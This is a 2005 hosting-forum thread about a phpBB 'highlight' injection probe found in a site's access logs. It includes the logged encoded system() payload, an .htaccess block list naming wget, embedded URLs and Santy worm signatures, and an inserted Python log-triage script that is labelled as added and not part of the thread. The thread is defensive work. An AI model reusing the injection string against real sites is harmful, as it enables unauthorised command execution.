Welcome to the JaguarPC Community
This is a discussion on Is this code a forum attack of some sort? in the Shared & Semi-Dedicated forum

  1. #1
    Rawr! kiwi li's Avatar
    Join Date
    Sep 2002
    Posts
    471

    Is this code a forum attack of some sort?

    I've been checking my logs during the past day or so and I've been receiving hundreds upon hundreds of bad URLs, I've included a few below, but I don't know what these people are trying to accomplish...

    66.118.187.66 - - [27/Sep/2005:01:39:02 -0500] "GET /lom/viewtopic.php?p=195&highlight=%2527%252E system(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 404 665 "-" "Mozilla/4.0"

    edited to save post space, deleted the other IP address logs
    Last edited by kiwi li; 09-28-2005 at 10:38 PM.
    If you see me posting, there must be bad news. ^^

  2. #2
    Yeah, I know a LOT! Vin DSL's Avatar
    Join Date
    Mar 2003
    Location
    Arizona Uplands
    Posts
    10,775
    Someone is trying to hack your board with the highlight hole...
    DISCLAIMER Any resemblance between the views expressed above and those of the owners and operators of this system is purely coincidental. Any resemblance between these views and my own are non-deterministic. The existence of Vin DSL is questionable. The existence of views in the absence of anyone to hold them is problematic. The existence of the reader is left as an exercise in the second-order coefficient.

    No Guts, No Story! VinDSL © 2010

  3. #3
    Rawr! kiwi li's Avatar
    Join Date
    Sep 2002
    Posts
    471
    I guess I'm lucky I took the board offline then? ^^ Sounds evil... ^^

    I'm guessing what they're doing is automated though because I see hundreds of different IPs and they're all hitting me with the same code at once? ^^

    And since the board doesn't exist, (that board stopped existing since February) they're eating my 404.jpg file... maybe I should take it off for the time being... ^^;;

    Thank you for your help again! ^_^
    Last edited by kiwi li; 09-27-2005 at 01:15 AM.
    If you see me posting, there must be bad news. ^^

  4. #4
    Yeah, I know a LOT! Vin DSL's Avatar
    Join Date
    Mar 2003
    Location
    Arizona Uplands
    Posts
    10,775
    Hrm...

    Well, I'm just guessing. I haven't got much to go by...

    Are these worms eating up your bandwidth by any chance?
    DISCLAIMER Any resemblance between the views expressed above and those of the owners and operators of this system is purely coincidental. Any resemblance between these views and my own are non-deterministic. The existence of Vin DSL is questionable. The existence of views in the absence of anyone to hold them is problematic. The existence of the reader is left as an exercise in the second-order coefficient.

    No Guts, No Story! VinDSL © 2010

  5. #5
    Yeah, I know a LOT! Vin DSL's Avatar
    Join Date
    Mar 2003
    Location
    Arizona Uplands
    Posts
    10,775
    Just for the heck of it, I looked at my logs, and I haven't been bombed by worms in a long time. You might consider putting this in your .htaccess file -- it's what I use...

    Code:
    #Check for Santy Worms, et cetera, and redirect to a PHANTOM site.
    #mod_rewrite must be switched on before any RewriteCond/RewriteRule is read.
    RewriteEngine On
    #Variant-1 May cause problems with CRON jobs set from cPanel.
    RewriteCond %{HTTP_USER_AGENT} ^LWP                     [NC,OR]
    #Variant-2 No reported problems. (REQUEST_URI always begins with "/", so the pattern is left unanchored.)
    RewriteCond %{REQUEST_URI} visualcoders                 [NC,OR]
    #Variant-3 No reported problems.
    RewriteCond %{QUERY_STRING} rush=([^&]+)                [NC,OR]
    #Variant-4 May cause problems with cPanel updates, et cetera.
    RewriteCond %{QUERY_STRING} ^(.*)wget(.*)               [NC,OR]
    #variant-5 Redirect all inner http:// requests.
    RewriteCond %{QUERY_STRING} ^(.*)http://(.*)            [NC,OR]
    #variant-6 Redirect all inner http requests even if encoded.
    RewriteCond %{QUERY_STRING} ^(.*)http%3A%2F%2F(.*)      [NC,OR]
    #variant-7 Prevent access from santy webworm a-e.
    RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527       [NC,OR]
    #variant-8 Prevent pre php 4.3.10 bug. (The last condition carries no OR, so it closes the chain.)
    RewriteCond %{HTTP_COOKIE} s:(.*):\%22test1\%22\%3b     [NC]
    RewriteRule ^.*$ http://www.goawayanddontcomeback.com   [L]
    Evidently it's still effective!
    DISCLAIMER Any resemblance between the views expressed above and those of the owners and operators of this system is purely coincidental. Any resemblance between these views and my own are non-deterministic. The existence of Vin DSL is questionable. The existence of views in the absence of anyone to hold them is problematic. The existence of the reader is left as an exercise in the second-order coefficient.

    No Guts, No Story! VinDSL © 2010
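    An added example (not code from this thread or from any of its posters) tying post #1 and post #5 together: it parses Apache combined-log lines, applies the same conditions as the RewriteCond rules above as Python checks, and for a request flagged by the highlight=%2527 rule decodes the chr(N) sequence so an admin can see what the probe was actually trying to run. The combined log format is assumed; the HTTP_COOKIE rule is left out because cookies are not part of that format, and the second and third sample lines are constructed.

```python
"""Triage helper for the phpBB "highlight" probes discussed in this thread.
Added example: parses combined-log lines, mirrors the .htaccess conditions from
post #5, and decodes the chr(N) payload of a flagged request."""
import re
from urllib.parse import unquote

# Combined log format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Python equivalents of the RewriteCond checks (all case-insensitive, like [NC]).
# The HTTP_COOKIE check is omitted: the combined log format does not record cookies.
SIGNATURES = [
    ("agent-lwp",        lambda h: h["agent"].upper().startswith("LWP")),
    ("uri-visualcoders", lambda h: "visualcoders" in h["path"].lower()),
    ("query-rush",       lambda h: re.search(r"rush=[^&]+", h["query"], re.I) is not None),
    ("query-wget",       lambda h: "wget" in h["query"].lower()),
    ("query-http",       lambda h: "http://" in h["query"].lower()
                                    or "http%3a%2f%2f" in h["query"].lower()),
    ("highlight-2527",   lambda h: "highlight=%2527" in h["query"].lower()),
]


def parse_line(line):
    """Split one combined-log line into fields; returns None if it does not parse.
    The request line is split on its first and last space so a URI that itself
    contains a space (as the logged probe in post #1 does) is kept whole."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hit = m.groupdict()
    words = hit["request"].split(" ")
    if len(words) < 3:
        return None
    hit["method"], hit["protocol"] = words[0], words[-1]
    uri = " ".join(words[1:-1])
    hit["path"], _, hit["query"] = uri.partition("?")
    return hit


def matched_signatures(hit):
    """Names of the .htaccess conditions this request would have triggered."""
    return [name for name, check in SIGNATURES if check(hit)]


def decode_chr_payload(query):
    """Undo the double URL-encoding the highlight bug relied on (%2527 -> %27 -> ')
    and turn the chr(N).chr(N)... sequence back into the string it builds."""
    decoded = unquote(unquote(query))
    codes = re.findall(r"chr\((\d+)\)", decoded)
    return "".join(chr(int(c)) for c in codes)


def triage(lines):
    """Return (ip, matched signature names, decoded payload or '') per flagged line."""
    findings = []
    for line in lines:
        hit = parse_line(line)
        if hit is None:
            continue
        names = matched_signatures(hit)
        if names:
            payload = decode_chr_payload(hit["query"]) if "highlight-2527" in names else ""
            findings.append((hit["ip"], names, payload))
    return findings


# Constructed sample log. The first line is the one quoted in post #1 (with the
# forum's line-wrapping spaces inside tokens removed); the other two are made up.
SAMPLE_LOG = [
    '66.118.187.66 - - [27/Sep/2005:01:39:02 -0500] "GET /lom/viewtopic.php?p=195'
    '&highlight=%2527%252E system(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)'
    '%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)'
    '%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)'
    '%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)'
    '%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527'
    ' HTTP/1.0" 404 665 "-" "Mozilla/4.0"',
    # Constructed: a "rush=" fetch-from-URL probe of the kind Variant-3 and -5 catch.
    '198.51.100.7 - - [27/Sep/2005:02:10:11 -0500] "GET /forum/viewtopic.php?t=12'
    '&rush=http://203.0.113.5/x HTTP/1.0" 404 665 "-" "Mozilla/4.0"',
    # Constructed: an ordinary request that must not be flagged.
    '192.0.2.33 - - [27/Sep/2005:02:11:45 -0500] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, names, payload in triage(SAMPLE_LOG):
        print(ip, ",".join(names), repr(payload))
```

    Run against the sample, the logged probe decodes to a harmless `perl -e "print q(...)"` echo: the worm is only testing whether the highlight parameter reaches system(), which is why a site that no longer runs phpBB sees nothing but 404s. The same checks can be pointed at a real access log to count how much of the 404 traffic these rules would have short-circuited.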

  6. #6
    the Windlord Gwaihir's Avatar
    Join Date
    Jun 2002
    Posts
    2,562
    That "highlight hole" was a problem with phpBB. It was fixed with version 2.0.15 if I recall correctly. Just don't put any phpBB of a version older than that out and you haven't got anything to worry about, it will simply blow over.

    That is: unless you are really, really tight on bandwidth: with a lot of (blocking) effort you could save a bit.
    Regards,

    Wim Heemskerk
    ---
    Visit MeCCG.net - Cardgaming in J.R.R. Tolkien's Middle-earth
    And Gwaihir.net - The Middle-earth CCG store

  7. #7
    Rawr! kiwi li's Avatar
    Join Date
    Sep 2002
    Posts
    471
    Well, I had a 404 error jpg I was showing that was 120KBs and I think I roughly got about 200-300 bad hits on there, so I think they would at max have eaten 360MBs? I don't really mind since I never reached my maximum limit anyways... it's only 25GB used this month and it's almost the new month already. ^^

    Yah... I don't think I'll be using phpBB, or any other messageboard for that matter since I don't really have the time to update it... ^^ Too many exams... >.<

    Thank you for the code, I'll go try it out! ^_^
    If you see me posting, there must be bad news. ^^

  8. #8
    Yeah, I know a LOT! Vin DSL's Avatar
    Join Date
    Mar 2003
    Location
    Arizona Uplands
    Posts
    10,775
    Quote Originally Posted by kiwi li
    I don't really mind since I never reached my maximum limit anyways... it's only 25GB used this month and it's almost the new month already. ^^
    Yeah, but I'm sure JagPC, et al, would appreciate if 'we' stopped malicious attacks against 'our' web sites. They can't catch them all...

    I know a guy that got hammered by worms to a tune of 300MB an hour. If enough sites are being attacked here, it WILL affect the whole network, you know?
    DISCLAIMER Any resemblance between the views expressed above and those of the owners and operators of this system is purely coincidental. Any resemblance between these views and my own are non-deterministic. The existence of Vin DSL is questionable. The existence of views in the absence of anyone to hold them is problematic. The existence of the reader is left as an exercise in the second-order coefficient.

    No Guts, No Story! VinDSL © 2010

  9. #9
    || $name ne 'R.Stiltskin'
    Join Date
    Jun 2003
    Location
    Tejas
    Posts
    2,438
    Quote Originally Posted by kiwi li
    Well, I had a 404 error jpg I was showing that was 120KBs and I think I roughly got about 200-300 bad hits on there, so I think they would at max have eaten 360MBs?
    In the grand scheme, this amount of bandwidth is not too extreme. However, it is still inefficient and wasteful. Surely the image can be reduced in size, the 404 HTML reformatted, or a simplified response file presented. After all it is just a "File Not Found" error and is more of a housecleaning issue than a front page facade.

    Amazingly, Vin is right here too.

  10. #10
    Rawr! kiwi li's Avatar
    Join Date
    Sep 2002
    Posts
    471
    That's because the 404 error is the only thing on my website... ^^;;;;;;;;;;;;;;;;;; It's like giving away free money to someone... ^^;;;;

    And, I have already changed the 404 image to 20kbs even before I started this thread!

    I don't know how to stop malicious attacks... ^^ That's why I have to post here or write that help ticket to jaguarpc.... although I think that they would probably catch it as well... ^^ I think...

    Hmm... maybe I should make my 404 error larger.... maybe a mosaic format... ¬.¬

    300 MBs an hour is a lot... ^^ Is there a worm that downloads everything or something like that?
    Last edited by kiwi li; 09-28-2005 at 11:17 PM.
    If you see me posting, there must be bad news. ^^

  11. #11
    || $name ne 'R.Stiltskin'
    Join Date
    Jun 2003
    Location
    Tejas
    Posts
    2,438
    Quote Originally Posted by kiwi li
    And, I have already changed the 404 image to 20kbs even before I started this thread!
    That's a good start.

    I don't know how to stop malicious attacks... ^^ That's why I have to post here or write that help ticket to jaguarpc.
    Keep providing info and eventually we'll stumble upon a reasonable solution. One thing you could try temporarily until a good block can be applied is to define a response in the top level .htaccess directive context file:
    Code:
    ErrorDocument 404 "<html><body><p>404 - File Not Found<br />\
    (Please visit <a href=http://www.kiwili.com/>www.kiwili.com</a>.)</p></body></html>
    This will provide the appropriate 404 response using a small amount of both user and machine readable text as well as provide an acceptable response page for search engines. You can modify that text string to suit your needs. Copy those two lines and place them in the .htaccess file (exactly as written at first during testing). Next, visit your own site at http://www.kiwili.com/this_is_a_test.html (substituting your proper domain name, of course) and watch what happens. Simple. Edit as desired but terminate all lines except the last quoted line with the backslash "\" character. It should look like this in your browser:
    Code:
    404 - File Not Found
    (Please visit www.kiwili.com.)
    Is there a worm that downloads everything or something like that?
    A worm could be revisiting your site repeatedly and, failing to find the desired file, searches again and again. Or it could be a script searching for vulnerabilities. I occasionally get those and report them to the ISP or webhost.
